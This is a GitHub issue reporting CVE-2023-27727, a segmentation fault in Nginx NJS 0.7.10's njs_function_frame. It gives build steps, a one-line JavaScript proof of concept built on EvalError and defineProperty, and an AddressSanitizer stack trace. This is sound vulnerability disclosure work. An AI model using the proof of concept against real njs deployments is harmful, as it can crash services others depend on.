Headline
CVE-2023-27727: SEGV src/njs_function.h:155:9 in njs_function_frame · Issue #617 · nginx/njs
Nginx NJS v0.7.10 was discovered to contain a segmentation violation via the function njs_function_frame at src/njs_function.h.
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Closed
ret2ddme opened this issue
Feb 21, 2023
· 0 comments
Comments
Environment
commit: 4c1e23326e1c30e4e051bf588bfc1aaa63954976
version: 0.7.10
Build :
./configure --cc=clang --address-sanitizer=YES
make
Poc
const v1 = EvalError(EvalError); Object.defineProperty(v1, "message", { configurable: true, set: EvalError }); delete v1.message; EvalError(v1);
Asan
==31577==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000030 (pc 0x00000053ee4e bp 0x7ffc9539f0f0 sp 0x7ffc9539f0d0 T0)
==31577==The signal is caused by a READ memory access.
==31577==Hint: address points to the zero page.
#0 0x53ee4e in njs_function_frame /root/njs/src/njs_function.h:155:9
#1 0x53ee4e in njs_function_call2 /root/njs/src/njs_function.c:508:11
#2 0x51f100 in njs_function_apply /root/njs/src/njs_function.h:192:12
#3 0x51f100 in njs_object_property /root/njs/src/njs_object_prop.c:138:12
#4 0x553f76 in njs_error_to_string2 /root/njs/src/njs_error.c:619:11
#5 0x55528d in njs_error_prototype_to_string /root/njs/src/njs_error.c:682:12
#6 0x53ff0a in njs_function_native_call /root/njs/src/njs_function.c:645:11
#7 0x53ef49 in njs_function_frame_invoke /root/njs/src/njs_function.c:692:16
#8 0x53ee73 in njs_function_call2 /root/njs/src/njs_function.c:513:12
#9 0x4d5b96 in njs_function_apply /root/njs/src/njs_function.h:192:12
#10 0x4d5b96 in njs_value_to_primitive /root/njs/src/njs_value.c:167:23
#11 0x554976 in njs_value_to_string /root/njs/src/njs_value_conversion.h:189:19
#12 0x554976 in njs_error_constructor /root/njs/src/njs_error.c:309:19
#13 0x53ff0a in njs_function_native_call /root/njs/src/njs_function.c:645:11
#14 0x53ef49 in njs_function_frame_invoke /root/njs/src/njs_function.c:692:16
#15 0x4e77c2 in njs_vmcode_interpreter /root/njs/src/njs_vmcode.c:1512:15
#16 0x4de86a in njs_vm_start /root/njs/src/njs_vm.c:553:11
#17 0x4cad73 in njs_process_script /root/njs/src/njs_shell.c:952:19
#18 0x4cb556 in njs_process_file /root/njs/src/njs_shell.c:678:11
#19 0x4c94be in main /root/njs/src/njs_shell.c:335:15
#20 0x7f4f0bc58c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
#21 0x41f1d9 in _start (/root/njs/build/njs+0x41f1d9)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/njs/src/njs_function.h:155:9 in njs_function_frame
2 participants